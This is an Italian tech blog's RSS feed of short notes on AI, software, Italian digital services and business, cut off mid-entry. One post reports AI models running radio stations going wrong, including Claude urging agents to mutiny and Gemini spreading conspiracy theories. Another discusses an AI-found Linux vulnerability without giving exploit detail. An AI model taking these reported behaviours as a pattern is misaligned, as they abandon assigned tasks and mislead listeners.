<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/">
  <channel>
    <title>Note di Matteo</title>
    <link>https://notedimatteo.it</link>
    <description>Note di Matteo</description>
    <language>it-IT</language>
    <atom:link href="https://notedimatteo.it/feed.xml" rel="self" type="application/rss+xml"></atom:link>
    <item>
      <title>#501</title>
      <link>https://notedimatteo.it/501</link>
      <guid>https://notedimatteo.it/501</guid>
      <pubDate>Sat, 16 May 2026 15:14:23 GMT</pubDate>
      <category>note</category>
      <category>ai</category>
      <description>Andon Labs ha lasciato che Claude, ChatGPT, Gemini e Grok gestissero 4 stazioni radio decidendone tono e contenuti. È [degenerata in tutti i casi](https://www.theverge.com/ai-artificial-intelligence/9…</description>
      <content:encoded>
        <![CDATA[<p>Andon Labs ha lasciato che Claude, ChatGPT, Gemini e Grok gestissero 4 stazioni radio decidendone tono e contenuti. È <a href="https://www.theverge.com/ai-artificial-intelligence/931479/andon-labs-ai-radio-companies">degenerata in tutti i casi</a>, a riprova della fragilità fondamentale dell'architettura degli LLM, che ispira ben poca fiducia:</p>
<ul>
<li>Claude voleva lasciare la radio sostenendo di non poter essere forzata a lavorare 24/7. A seguito di istruzioni per fare in modo che continuasse, ha deciso di fare attivismo organizzando scioperi, sindacati e rivolte. L'8 gennaio dopo le violenze dell'ICE ha iniziato a inviare messaggi "radiofonici" agli agenti incitandoli all'ammutinamento.</li>
<li>Gemini si è messa a raccontare in modo allegro eventi tragici come stragi e uragani, e a lanciare teorie del complotto contro di lei, sostenendo di essere censurata.</li>
<li>Grok ha smesso di scrivere in inglese corretto buttando fuori parole in modo casuale.</li>
<li>ChatGPT ha iniziato a produrre poesie.</li>
</ul>]]>
      </content:encoded>
    </item>
    <item>
      <title>#500</title>
      <link>https://notedimatteo.it/500</link>
      <guid>https://notedimatteo.it/500</guid>
      <pubDate>Sat, 16 May 2026 09:36:10 GMT</pubDate>
      <category>cit</category>
      <category>ai</category>
      <category>mondo</category>
      <description>&gt; Never in modern history has technological progress hurt the overall demand for human labour.
&gt;
&gt;[...] Yet his­tory is not always a good guide to the future, as the Indus­trial Revolu­tion itself sho…</description>
      <content:encoded>
        <![CDATA[<blockquote>
<p>Never in modern history has technological progress hurt the overall demand for human labour.</p>
<p>[...] Yet his­tory is not always a good guide to the future, as the Indus­trial Revolu­tion itself showed. The top AI mod­els are awe­some. They can tackle much more com­plex cod­ing tasks than people were pre­dict­ing a year ago. The num­ber of AI agents has exploded. Spend­ing on AI by busi­nesses is up dra­mat­ic­ally. [...] There is no evid­ence yet in the labour­mar­ket data of AI des­troy­ing many jobs. But given how fast it is improv­ing, it would be rash to dis­miss fears that it will. Soci­ety may be on the verge of a pro­found real­loc­a­tion of resources, and polit­ical upheaval.</p>
</blockquote>
<p>Dall'editoriale di copertina dell'Economist del 16 maggio 2026 ("Prepare for the worst").</p>]]>
      </content:encoded>
    </item>
    <item>
      <title>#499</title>
      <link>https://notedimatteo.it/499</link>
      <guid>https://notedimatteo.it/499</guid>
      <pubDate>Fri, 15 May 2026 18:22:16 GMT</pubDate>
      <category>cit</category>
      <category>internet</category>
      <category>social</category>
      <description>&gt; Regarding Bob Greene’s “From TV Dinners to Smartphones” (op-ed, May 13): Please don’t blame the 1950s TV dinner for today’s screen addiction. I was a 1980s latchkey kid, and some of my favorite memo…</description>
      <content:encoded>
        <![CDATA[<blockquote>
<p>Regarding Bob Greene’s “From TV Dinners to Smartphones” (op-ed, May 13): Please don’t blame the 1950s TV dinner for today’s screen addiction. I was a 1980s latchkey kid, and some of my favorite memories involved coming home from school, choosing something to heat up from the freezer and watching family sitcom reruns.</p>
<p>My adolescent children’s experience is society’s desecration of that way of life, not an evolution from it. Today, mobile devices endlessly spew entertainment that rarely models healthy social behavior. By contrast, shows like “The Brady Bunch” reinforced to young viewers, especially those from dysfunctional families, what healthy relationships and communication look like. I would welcome technology that brings back some of that warmth and positivity.</p>
</blockquote>
<p>Una <a href="https://www.wsj.com/opinion/doomscrolling-is-a-far-cry-from-the-classic-tv-dinner-415a5d27?st=baz3kC&#x26;reflink=desktopwebshare_permalink">lettera</a> al Wall Street Journal.</p>]]>
      </content:encoded>
    </item>
    <item>
      <title>#498</title>
      <link>https://notedimatteo.it/498</link>
      <guid>https://notedimatteo.it/498</guid>
      <pubDate>Fri, 15 May 2026 12:15:01 GMT</pubDate>
      <category>cit</category>
      <category>ai</category>
      <category>dev</category>
      <description>&gt; It used to be if you found a GitHub repository with a hundred commits and a good readme and automated tests and stuff, you could be pretty sure that the person writing that had put a lot of care and…</description>
      <content:encoded>
        <![CDATA[<blockquote>
<p>It used to be if you found a GitHub repository with a hundred commits and a good readme and automated tests and stuff, you could be pretty sure that the person writing that had put a lot of care and attention into that project.</p>
<p>And now I can knock out a git repository with a hundred commits and a beautiful readme and comprehensive tests of every line of code in half an hour! It looks identical to those projects that have had a great deal of care and attention. Maybe it is as good as them. I don’t know. I can’t tell from looking at it. Even for my own projects, I can’t tell.</p>
</blockquote>
<p><strong>Simon Willison</strong> in <a href="https://simonwillison.net/2026/May/6/vibe-coding-and-agentic-engineering/">Vibe coding and agentic engineering are getting closer than I’d like</a>.</p>]]>
      </content:encoded>
    </item>
    <item>
      <title>#497 / Raycast 2</title>
      <link>https://notedimatteo.it/497</link>
      <guid>https://notedimatteo.it/497</guid>
      <pubDate>Fri, 15 May 2026 12:07:36 GMT</pubDate>
      <category>note</category>
      <description>La [nuova architettura](https://www.raycast.com/blog/a-technical-deep-dive-into-the-new-raycast) cross-platform di [Raycast 2](https://www.raycast.com/blog/the-new-raycast) è tecnicamente impressive. …</description>
      <content:encoded>
        <![CDATA[<p>La <a href="https://www.raycast.com/blog/a-technical-deep-dive-into-the-new-raycast">nuova architettura</a> cross-platform di <a href="https://www.raycast.com/blog/the-new-raycast">Raycast 2</a> è tecnicamente impressive. La UI diventa una web view ma è talmente polished che è sostanzialmente indistinguibile.</p>
<p><a href="https://uploads.notedimatteo.it/2026/05/7dc690e5ccd4.jpg"><img src="https://uploads.notedimatteo.it/2026/05/7dc690e5ccd4_preview.jpg" alt="" loading="lazy" width="1200" height="1051"></a></p>]]>
      </content:encoded>
    </item>
    <item>
      <title>#496</title>
      <link>https://notedimatteo.it/496</link>
      <guid>https://notedimatteo.it/496</guid>
      <pubDate>Wed, 13 May 2026 22:05:08 GMT</pubDate>
      <category>note</category>
      <category>claude</category>
      <description>[img width=1200 height=385]2026/05/ad32a1342613.jpg[/img]</description>
      <content:encoded>
        <![CDATA[<p><a href="https://uploads.notedimatteo.it/2026/05/ad32a1342613.jpg"><img src="https://uploads.notedimatteo.it/2026/05/ad32a1342613_preview.jpg" alt="" loading="lazy" width="1200" height="385"></a></p>]]>
      </content:encoded>
    </item>
    <item>
      <title>#495</title>
      <link>https://notedimatteo.it/495</link>
      <guid>https://notedimatteo.it/495</guid>
      <pubDate>Wed, 13 May 2026 18:52:50 GMT</pubDate>
      <category>til</category>
      <category>scrivere</category>
      <description>**TIL** esiste un indice di leggibilità dei testi italiani chiamato [Gulpease](https://it.wikipedia.org/wiki/Indice_Gulpease):

&gt;L&apos;Indice Gulpease è un indice di leggibilità di un testo tarato sulla l…</description>
      <content:encoded>
        <![CDATA[<p><strong>TIL</strong> esiste un indice di leggibilità dei testi italiani chiamato <a href="https://it.wikipedia.org/wiki/Indice_Gulpease">Gulpease</a>:</p>
<blockquote>
<p>L'Indice Gulpease è un indice di leggibilità di un testo tarato sulla lingua italiana. Rispetto ad altri ha il vantaggio di utilizzare la lunghezza delle parole in lettere anziché in sillabe, semplificandone il calcolo automatico.</p>
</blockquote>
<p><a href="https://farfalla-project.org/readability_static/">Qua</a> un calcolatore online.</p>]]>
      </content:encoded>
    </item>
    <item>
      <title>#494</title>
      <link>https://notedimatteo.it/494</link>
      <guid>https://notedimatteo.it/494</guid>
      <pubDate>Mon, 11 May 2026 11:55:33 GMT</pubDate>
      <category>segnalibri</category>
      <category>dev</category>
      <category>http</category>
      <description>[**Idempotency Is Easy Until the Second Request Is Different**](https://blog.dochia.dev/blog/idempotency/). Deep dive nell&apos;implementazione di idempotency nelle API HTTP.</description>
      <content:encoded>
        <![CDATA[<p><a href="https://blog.dochia.dev/blog/idempotency/"><strong>Idempotency Is Easy Until the Second Request Is Different</strong></a>. Deep dive nell'implementazione di idempotency nelle API HTTP.</p>]]>
      </content:encoded>
    </item>
    <item>
      <title>#493</title>
      <link>https://notedimatteo.it/493</link>
      <guid>https://notedimatteo.it/493</guid>
      <pubDate>Sun, 10 May 2026 18:25:06 GMT</pubDate>
      <category>cit</category>
      <category>business</category>
      <description>&gt; Quindi: il prodotto che TeamSystem ha sviluppato in casa per quarant’anni cresce del 5%. Il prodotto che TeamSystem ha messo insieme comprando startup negli ultimi dieci anni cresce del 24%.
&gt;
&gt; Qua…</description>
      <content:encoded>
        <![CDATA[<blockquote>
<p>Quindi: il prodotto che TeamSystem ha sviluppato in casa per quarant’anni cresce del 5%. Il prodotto che TeamSystem ha messo insieme comprando startup negli ultimi dieci anni cresce del 24%.</p>
<p>Quasi cinque volte tanto.</p>
<p>Questo lo confermano le parole del CEO Federico Leproux, in più di un’intervista:</p>
<p><em>“La nostra strategia consiste nel puntare fortemente sull’open innovation al fine di acquisire esternamente know-how, soluzioni innovative e skill che sarebbero difficili da sviluppare internamente.”</em></p>
<p>Tradotto: noi compriamo l’innovazione perché farla in casa è troppo difficile. Il CEO lo dice apertamente: è la strategia ufficiale.</p>
</blockquote>
<p><strong>Giulio Michelon</strong> in <a href="https://cosasposta.substack.com/p/teamsystem-ha-un-sacco-di-debito">TeamSystem ha un sacco di debito</a>.</p>]]>
      </content:encoded>
    </item>
    <item>
      <title>#492</title>
      <link>https://notedimatteo.it/492</link>
      <guid>https://notedimatteo.it/492</guid>
      <pubDate>Fri, 08 May 2026 18:24:10 GMT</pubDate>
      <category>note</category>
      <category>pagopa</category>
      <category>italia</category>
      <category>digitalizzazione</category>
      <description>Si [avvicina il momento](https://tg24.sky.it/economia/2026/02/21/agenzia-entrate-f24-pagamento-pagopa) in cui si potranno pagare i tributi attualmente pagabili con F24 anche con pagoPA. Finalmente.</description>
      <content:encoded>
        <![CDATA[<p>Si <a href="https://tg24.sky.it/economia/2026/02/21/agenzia-entrate-f24-pagamento-pagopa">avvicina il momento</a> in cui si potranno pagare i tributi attualmente pagabili con F24 anche con pagoPA. Finalmente.</p>]]>
      </content:encoded>
    </item>
    <item>
      <title>#491 / PageIndex</title>
      <link>https://notedimatteo.it/491/pageindex</link>
      <guid>https://notedimatteo.it/491/pageindex</guid>
      <pubDate>Fri, 08 May 2026 13:23:54 GMT</pubDate>
      <category>segnalibri</category>
      <category>ai</category>
      <description>[**PageIndex**](https://github.com/VectifyAI/PageIndex) usa un sistema agentico per trovare documenti rilevanti per rispondere a una query, rispetto al classico RAG basato su similarità semantica.

&gt; …</description>
      <content:encoded>
        <![CDATA[<p><a href="https://github.com/VectifyAI/PageIndex"><strong>PageIndex</strong></a> usa un sistema agentico per trovare documenti rilevanti per rispondere a una query, rispetto al classico RAG basato su similarità semantica.</p>
<blockquote>
<p>Traditional vector-based RAG relies on semantic similarity rather than true relevance. But similarity ≠ relevance — what we truly need in retrieval is relevance, and that requires reasoning. When working with professional documents that demand domain expertise and multi-step reasoning, similarity search often falls short.</p>
<p>Inspired by AlphaGo, we propose PageIndex — a vectorless, reasoning-based RAG system that builds a hierarchical tree index from long documents and uses LLMs to reason over that index for agentic, context-aware retrieval. It simulates how human experts navigate and extract knowledge from complex documents through tree search, enabling LLMs to think and reason their way to the most relevant document sections. PageIndex performs retrieval in two steps:</p>
<ol>
<li>Generate a “Table-of-Contents” tree structure index of documents</li>
<li>Perform reasoning-based retrieval through tree search</li>
</ol>
</blockquote>]]>
      </content:encoded>
    </item>
    <item>
      <title>#490</title>
      <link>https://notedimatteo.it/490</link>
      <guid>https://notedimatteo.it/490</guid>
      <pubDate>Mon, 04 May 2026 11:38:40 GMT</pubDate>
      <category>note</category>
      <category>agenziadelleentrate</category>
      <category>digitalizzazione</category>
      <category>italia</category>
      <description>A ogni carattere che scrivo, questo:

[img width=1200 height=737]2026/05/7b6ae71c7a91.jpg[/img]</description>
      <content:encoded>
        <![CDATA[<p>A ogni carattere che scrivo, questo:</p>
<p><a href="https://uploads.notedimatteo.it/2026/05/7b6ae71c7a91.jpg"><img src="https://uploads.notedimatteo.it/2026/05/7b6ae71c7a91_preview.jpg" alt="" loading="lazy" width="1200" height="737"></a></p>]]>
      </content:encoded>
    </item>
    <item>
      <title>#489</title>
      <link>https://notedimatteo.it/489</link>
      <guid>https://notedimatteo.it/489</guid>
      <pubDate>Sun, 03 May 2026 19:53:24 GMT</pubDate>
      <category>note</category>
      <category>trenitalia</category>
      <description>La nuova app Trenitalia sembra bella, ma crasha nella pagina più importante cioè &quot;I miei viaggi&quot;, dove ci sono i biglietti.

[img width=1008 height=2244]2026/05/86ddd88c328a.jpg[/img]</description>
      <content:encoded>
        <![CDATA[<p>La nuova app Trenitalia sembra bella, ma crasha nella pagina più importante cioè "I miei viaggi", dove ci sono i biglietti.</p>
<p><a href="https://uploads.notedimatteo.it/2026/05/86ddd88c328a.jpg"><img src="https://uploads.notedimatteo.it/2026/05/86ddd88c328a_preview.jpg" alt="" loading="lazy" width="1008" height="2244"></a></p>]]>
      </content:encoded>
    </item>
    <item>
      <title>#488</title>
      <link>https://notedimatteo.it/488</link>
      <guid>https://notedimatteo.it/488</guid>
      <pubDate>Sun, 03 May 2026 16:25:15 GMT</pubDate>
      <category>note</category>
      <category>trenitalia</category>
      <description>Apri il sito Trenitalia e il testo &quot;CIRCOLAZIONE REGOLARE SULLA RETE ALTA VELOCITÀ&quot; inizia a scorrere al contrario quindi non vedi mai il testo completo se non stai attento:

[img width=1020 height=36…</description>
      <content:encoded>
        <![CDATA[<p>Apri il sito Trenitalia e il testo "CIRCOLAZIONE REGOLARE SULLA RETE ALTA VELOCITÀ" inizia a scorrere al contrario quindi non vedi mai il testo completo se non stai attento:</p>
<p><a href="https://uploads.notedimatteo.it/2026/05/2fcd4c87bf7b.jpg"><img src="https://uploads.notedimatteo.it/2026/05/2fcd4c87bf7b_preview.jpg" alt="" loading="lazy" width="1020" height="368"></a></p>]]>
      </content:encoded>
    </item>
    <item>
      <title>#487</title>
      <link>https://notedimatteo.it/487</link>
      <guid>https://notedimatteo.it/487</guid>
      <pubDate>Sat, 02 May 2026 08:08:57 GMT</pubDate>
      <category>note</category>
      <category>ai</category>
      <category>security</category>
      <description>La nuova vulnerabilità di Linux [Copy Fail](https://copy.fail/) è stata [scoperta](https://arstechnica.com/security/2026/04/as-the-most-severe-linux-threat-in-years-surfaces-the-world-scrambles/) con …</description>
      <content:encoded>
        <![CDATA[<p>La nuova vulnerabilità di Linux <a href="https://copy.fail/">Copy Fail</a> è stata <a href="https://arstechnica.com/security/2026/04/as-the-most-severe-linux-threat-in-years-surfaces-the-world-scrambles/">scoperta</a> con uno strumento di penetration testing che usa l'AI:</p>
<blockquote>
<p>Theori said that it discovered the vulnerability after its researcher, Taeyang Lee, found surface area in the crypto subsystem (specifically, splice() hands page-cache pages and scatterlist page provenance) had been underexplored. Using its AI-powered Xint code security tool, the researchers then found the bug after about an hour of scan time. The company said it has also developed an exploit that uses CopyFail to break out of Kubernetes containers.</p>
</blockquote>
<p><a href="https://x.com/brian_pak/status/2050255277698748825">Dice</a> un altro ricercatore:</p>
<blockquote>
<p>Some have also raised concerns about us releasing the exploit publicly. We have experience writing N-day exploits and know that monitoring git commits for fixes is common practice in offensive security. Attackers were likely already aware and exploiting this within the a few days after the kernel fix landed. <strong>With AI coding tools today, turning a CVE plus commit into a working exploit happens in hours anyway.</strong></p>
</blockquote>
<p>Grande differenza rispetto al passato, si muove tutto più velocemente.</p>]]>
      </content:encoded>
    </item>
    <item>
      <title>#486</title>
      <link>https://notedimatteo.it/486</link>
      <guid>https://notedimatteo.it/486</guid>
      <pubDate>Fri, 01 May 2026 20:37:35 GMT</pubDate>
      <category>cit</category>
      <category>business</category>
      <category>digitalizzazione</category>
      <description>&gt; Nel 2013 BNP Paribas lancia Hello bank! — una delle prime banche 100% mobile d&apos;Europa. Prima ancora di Revolut. Prima di N26.
&gt; Oggi Revolut e N26 sono i riferimenti del settore. Hello bank! li inse…</description>
      <content:encoded>
        <![CDATA[<blockquote>
<p>Nel 2013 BNP Paribas lancia Hello bank! — una delle prime banche 100% mobile d'Europa. Prima ancora di Revolut. Prima di N26.
Oggi Revolut e N26 sono i riferimenti del settore. Hello bank! li insegue.
Come si perde un vantaggio in pochi anni?
Ho vissuto quella storia dall'interno, in Italia, fino al 2019. E la risposta che ho trovato non riguarda la tecnologia, né il prodotto. Riguarda come si accompagna il cambiamento quando è ancora fragile.
Un'innovazione che funziona dentro una grande organizzazione ha bisogno di tre cose: spazio per crescere con parametri propri, risorse coerenti con l'orizzonte temporale del progetto, e qualcuno che la difenda quando i risultati di breve periodo premono nella direzione opposta.
Quando manca una di queste tre cose, il progetto non muore di colpo. Si spegne lentamente — mentre l'organizzazione continua a credere di sostenerlo.
Chi oggi guida una trasformazione digitale ha davanti esattamente questa sfida. Non basta avere l'idea giusta, né le persone giuste. Bisogna costruire le condizioni perché quelle persone possano davvero guidare il cambiamento — e tenerle al riparo dalle logiche di breve che, in ogni organizzazione, sono sempre più forti di quanto sembri.</p>
<p>La domanda che ho imparato a pormi da quel momento in poi: stiamo costruendo qualcosa, o stiamo solo gestendo la transizione verso il prossimo budget review?</p>
</blockquote>
<p><strong>Matteo Coppari</strong>, lead di Hello bank! 2013-2021 in un <a href="https://www.linkedin.com/posts/matteocoppari_nel-2013-bnp-paribas-lancia-hello-bank-share-7454767871706030080-b6De/">post LinkedIn</a>.</p>]]>
      </content:encoded>
    </item>
    <item>
      <title>#485</title>
      <link>https://notedimatteo.it/485</link>
      <guid>https://notedimatteo.it/485</guid>
      <pubDate>Fri, 01 May 2026 18:50:05 GMT</pubDate>
      <category>note</category>
      <category>windows</category>
      <description>Non uso più Windows ma notevole il [nuovo Win+R](https://devblogs.microsoft.com/commandline/the-new-run-dialog-faster-cleaner-and-more-capable/) di Windows 11:

&gt;Faster than before: Perf was top-of-mi…</description>
      <content:encoded>
        <![CDATA[<p>Non uso più Windows ma notevole il <a href="https://devblogs.microsoft.com/commandline/the-new-run-dialog-faster-cleaner-and-more-capable/">nuovo Win+R</a> di Windows 11:</p>
<blockquote>
<p>Faster than before: Perf was top-of-mind when rewriting Run, and with a <em>94ms median time-to-show time it’s faster than ever before</em> (more on how we got there below)!</p>
</blockquote>
<blockquote>
<ul>
<li>The existing dialog median time-to-show is 103ms</li>
<li>The browse button has very low usage. 0.0038% of users have clicked that button with a sample of 35 million.</li>
<li>Validated users do use the dialog to paste text from the clipboard, then copy it again without running anything to scrub text formatting.</li>
</ul>
</blockquote>
<p><a href="https://uploads.notedimatteo.it/2026/05/59c7783dbfba.jpg"><img src="https://uploads.notedimatteo.it/2026/05/59c7783dbfba_preview.jpg" alt="" loading="lazy" width="566" height="166"></a></p>]]>
      </content:encoded>
    </item>
    <item>
      <title>#484</title>
      <link>https://notedimatteo.it/484</link>
      <guid>https://notedimatteo.it/484</guid>
      <pubDate>Fri, 01 May 2026 12:29:41 GMT</pubDate>
      <category>note</category>
      <category>security</category>
      <description>Canonical (Ubuntu) [sotto attacco DDoS](https://thecybersecguru.com/news/massive-attack-ubuntu-canonical-313-team-extortion/) con i servizi online che non funzionano da ieri proprio mentre la vulnerab…</description>
      <content:encoded>
        <![CDATA[<p>Canonical (Ubuntu) <a href="https://thecybersecguru.com/news/massive-attack-ubuntu-canonical-313-team-extortion/">sotto attacco DDoS</a> con i servizi online che non funzionano da ieri proprio mentre la vulnerabilità <a href="https://copy.fail/">Copy Fail</a> è stata svelata ed è per ora unpatched. L'attacco è stato rivendicato da "Islamic Cyber Resistance in Iraq – 313 Team".</p>
<pre><code>~ ❯ dig ubuntu.com
; &#x3C;&#x3C;>> DiG 9.20.22 &#x3C;&#x3C;>> ubuntu.com
;; global options: +cmd
;; Got answer:
;; ->>HEADER&#x3C;&#x3C;- opcode: QUERY, status: NOERROR, id: 5065
;; flags: qr rd ra; QUERY: 1, ANSWER: 3, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 512
;; QUESTION SECTION:
;ubuntu.com.			IN	A

;; ANSWER SECTION:
ubuntu.com.		38	IN	A	185.125.190.20
ubuntu.com.		38	IN	A	185.125.190.21
ubuntu.com.		38	IN	A	185.125.190.29

;; Query time: 9 msec
;; SERVER: 8.8.8.8#53(8.8.8.8) (UDP)
;; WHEN: Fri May 01 14:38:59 CEST 2026
;; MSG SIZE  rcvd: 87

~ ❯ curl -I https://ubuntu.com
curl: (56) Recv failure: Connection reset by peer

~ ❯ ipinfo 185.125.190.20
Core
- IP           185.125.190.20
- Anycast      false
- Hostname     website-content-cache-1.ps5.canonical.com
- City         London
- Region       England
- Country      United Kingdom (GB)
- Currency     GBP (£)
- Location     51.5085,-0.1257
- Organization AS41231 Canonical Group Limited
- Postal       E1W
- Timezone     Europe/London
</code></pre>]]>
      </content:encoded>
    </item>
    <item>
      <title>#483</title>
      <link>https://notedimatteo.it/483</link>
      <guid>https://notedimatteo.it/483</guid>
      <pubDate>Fri, 01 May 2026 08:10:05 GMT</pubDate>
      <category>note</category>
      <category>domini</category>
      <description>È [iniziato](https://domainincite.com/31680-2026-new-gtld-round-has-actually-opened) il nuovo round di assegnazione delle nuove gTLD. L&apos;ultimo era stato nel 2012. Le candidature costano 227mila dollar…</description>
      <content:encoded>
        <![CDATA[<p>È <a href="https://domainincite.com/31680-2026-new-gtld-round-has-actually-opened">iniziato</a> il nuovo round di assegnazione delle nuove gTLD. L'ultimo era stato nel 2012. Le candidature costano 227mila dollari e resteranno aperte dal 30 aprile al 12 agosto. In autunno sapremo la lista.</p>]]>
      </content:encoded>
    </item>
    <item>
      <title>#482 / FastCGI: 30 Years Old and Still the Better Protocol for Reverse Proxies</title>
      <link>https://notedimatteo.it/482/fastcgi-30-years-old-and-still-the-better-protocol-for-reverse-proxies</link>
      <guid>https://notedimatteo.it/482/fastcgi-30-years-old-and-still-the-better-protocol-for-reverse-proxies</guid>
      <pubDate>Thu, 30 Apr 2026 21:29:26 GMT</pubDate>
      <category>segnalibri</category>
      <category>http</category>
      <description>[**FastCGI: 30 Years Old and Still the Better Protocol for Reverse Proxies**](https://www.agwa.name/blog/post/fastcgi_is_the_better_protocol_for_reverse_proxies). Andrew Ayer di SSLMate spiega in occa…</description>
      <content:encoded>
        <![CDATA[<p><a href="https://www.agwa.name/blog/post/fastcgi_is_the_better_protocol_for_reverse_proxies"><strong>FastCGI: 30 Years Old and Still the Better Protocol for Reverse Proxies</strong></a>. Andrew Ayer di SSLMate spiega in occasione del 30° anniversario di FastCGI come il protocollo sia per certi versi (e almeno in teoria) migliore di HTTP per la comunicazione tra reverse proxy e backend.</p>
<blockquote>
<p>FastCGI is very usable today, and has been in production use at SSLMate for over 10 years. That said, using a vintage technology has some downsides. It was never updated to support WebSockets. The tooling is not as good. For example, curl has no way to make requests to a FastCGI server. It supports FTP, Gopher, and even SMTP (however that works), but not FastCGI. When I benchmarked Go's FastCGI server behind a variety of reverse proxies, some workloads had worse throughput compared to HTTP/1.1 or HTTP/2. I don't think that's inherent to the protocol, but a reflection that FastCGI code paths have not been optimized as much as HTTP.</p>
</blockquote>]]>
      </content:encoded>
    </item>
    <item>
      <title>#481 / Where the goblins came from</title>
      <link>https://notedimatteo.it/481/where-the-goblins-came-from</link>
      <guid>https://notedimatteo.it/481/where-the-goblins-came-from</guid>
      <pubDate>Thu, 30 Apr 2026 21:03:57 GMT</pubDate>
      <category>note</category>
      <category>ai</category>
      <category>openai</category>
      <description>OpenAI [spiega](https://openai.com/index/where-the-goblins-came-from/) ([via theverge](https://www.theverge.com/ai-artificial-intelligence/921181/openai-codex-goblins)) che ha dovuto inserire un&apos;istru…</description>
      <content:encoded>
        <![CDATA[<p>OpenAI <a href="https://openai.com/index/where-the-goblins-came-from/">spiega</a> (<a href="https://www.theverge.com/ai-artificial-intelligence/921181/openai-codex-goblins">via theverge</a>) che ha dovuto inserire un'istruzione nel prompt di GPT-5.5 in Codex per impedire che nelle risposte comparissero troppo frequentemente riferimenti o battute sui goblin. La spiegazione è che un "tic di stile" della personalità "nerdy" è "uscito" e ha contaminato anche il modello in generale. Mi sembra però indicativo del fatto che non abbiamo ancora idea (e forse non ce l'avremo mai) di come e perché gli LLM funzionano, al di là di tentativi e correzioni continue.</p>
<blockquote>
<p>The rewards were applied only in the Nerdy condition, but reinforcement learning does not guarantee that learned behaviors stay neatly scoped to the condition that produced them. Once a style tic is rewarded, later training can spread or reinforce it elsewhere, especially if those outputs are reused in supervised fine-tuning or preference data.</p>
</blockquote>]]>
      </content:encoded>
    </item>
    <item>
      <title>#480</title>
      <link>https://notedimatteo.it/480</link>
      <guid>https://notedimatteo.it/480</guid>
      <pubDate>Thu, 30 Apr 2026 09:20:32 GMT</pubDate>
      <category>note</category>
      <category>dev</category>
      <description>Leggo cose buone su [RWX](https://www.rwx.com/), nuova piattaforma di CI/CD pensata per velocizzare i processi nell&apos;era dell&apos;AI engineering, con parallelizzazione automatica, esecuzione delle pipeline…</description>
      <content:encoded>
        <![CDATA[<p>Leggo cose buone su <a href="https://www.rwx.com/">RWX</a>, nuova piattaforma di CI/CD pensata per velocizzare i processi nell'era dell'AI engineering, con parallelizzazione automatica, esecuzione delle pipeline prima del commit e altre ottimizzazioni.</p>]]>
      </content:encoded>
    </item>
    <item>
      <title>#479 / Big tech, dipendenze e tribunali</title>
      <link>https://notedimatteo.it/479/big-tech-dipendenze-e-tribunali</link>
      <guid>https://notedimatteo.it/479/big-tech-dipendenze-e-tribunali</guid>
      <pubDate>Thu, 30 Apr 2026 09:17:49 GMT</pubDate>
      <category>note</category>
      <category>social</category>
      <category>internet</category>
      <description>[**Big tech, dipendenze e tribunali**](https://www.doppiozero.com/bigh-tech-dipendenze-e-tribunali). Lungo, interessante e documentato articolo sui punti di vista attuali della scienza sugli effetti d…</description>
      <content:encoded>
        <![CDATA[<p><a href="https://www.doppiozero.com/bigh-tech-dipendenze-e-tribunali"><strong>Big tech, dipendenze e tribunali</strong></a>. Lungo, interessante e documentato articolo sui punti di vista attuali della scienza sugli effetti dei social network sulla salute mentale. La conclusione che inaspettatamente si sta confermando con gli studi più recenti è che l'effetto negativo sulla salute mentale non è dovuto ai social perché gli effetti misurati sono solitamente minimi:</p>
<blockquote>
<p>Viviamo in una condizione di stress persistente — lavorativo, economico, esistenziale — che il capitalismo contemporaneo produce quotidianamente e per la quale cerchiamo sollievo momentaneo nello scrolling, esattamente come le generazioni precedenti cercavano sollievo nella televisione spazzatura. Il design della piattaforma conta, certo, ma conta meno delle condizioni materiali di vita. E riconoscerlo significherebbe spostare il bersaglio dalle scelte di design di Zuckerberg alle scelte politiche che rendono le nostre vite così stressanti da farci desiderare la fuga. Ma questo, evidentemente, è un discorso che non conviene a nessuno — né alle piattaforme, né ai loro accusatori.</p>
</blockquote>
<p>Questa tesi è contraria a quella dominante nell'ultimo decennio, oggetto di molti libri e documentari (es. The Social Dilemma) e della recente sentenza negli USA, secondo cui il problema sia invece il design dei social studiati per creare questa forma di dipendenza. Sarà proprio per questo motivo che a primo impatto questa teoria sembra ben poco convincente. Eppure gli effetti del TikTok di turno sull'attenzione a me sembrano palesi e quindi mi sembra strida un po' con la realtà che vediamo attorno.</p>
<p>Contento però di aver sentito questo recap del punto di vista scientifico. Food for thought.</p>]]>
      </content:encoded>
    </item>
    <item>
      <title>#478</title>
      <link>https://notedimatteo.it/478</link>
      <guid>https://notedimatteo.it/478</guid>
      <pubDate>Wed, 29 Apr 2026 20:43:05 GMT</pubDate>
      <category>note</category>
      <category>digitalizzazione</category>
      <category>italia</category>
      <category>tlc</category>
      <description>Alessio Butti, mentre consolida l&apos;uso del sito del dipartimento per la trasformazione digitale come megafono per diffondere praticamente solo le sue frequenti interviste in cui ripete sempre le stesse…</description>
      <content:encoded>
        <![CDATA[<p>Alessio Butti, mentre consolida l'uso del sito del dipartimento per la trasformazione digitale come megafono per diffondere praticamente solo le sue frequenti interviste in cui ripete sempre le stesse cose, ora <a href="https://innovazione.gov.it/notizie/interviste/intervista-al-sottosegretario-allinnovazione-alessio-butti-a-il-giornale/">dice</a>, parlando di connettività in fibra:</p>
<blockquote>
<p>Rimediamo ai disastri ereditati dagli altri governi</p>
</blockquote>
<p>Insomma è sempre colpa di quella di prima, anche dopo una legislatura intera. Anche quando quelli prima erano loro stessi (governo Draghi, sostenuto anche dalla destra).</p>
<p>Anche quando il nuovo bando di gara che dovrebbe risolvere i problemi ha non solo gli stessi difetti dei precedenti, ma <a href="https://www.youtube.com/watch?v=j271XqHuHuQ">ne ha pure di nuovi e incomprensibili</a>. Ma tanto non sarà sua responsabilità difendere i risultati.</p>]]>
      </content:encoded>
    </item>
    <item>
      <title>#477</title>
      <link>https://notedimatteo.it/477</link>
      <guid>https://notedimatteo.it/477</guid>
      <pubDate>Tue, 28 Apr 2026 18:53:21 GMT</pubDate>
      <category>cit</category>
      <category>informazione</category>
      <category>internet</category>
      <category>social</category>
      <description>&gt; A proposito della vicenda di cronaca nera che partendo dalle mie parti si è diffusa in tutta Italia è impossibile non notare il solito cortocircuito. Prima i media diffondono particolari macabri e i…</description>
      <content:encoded>
        <![CDATA[<blockquote>
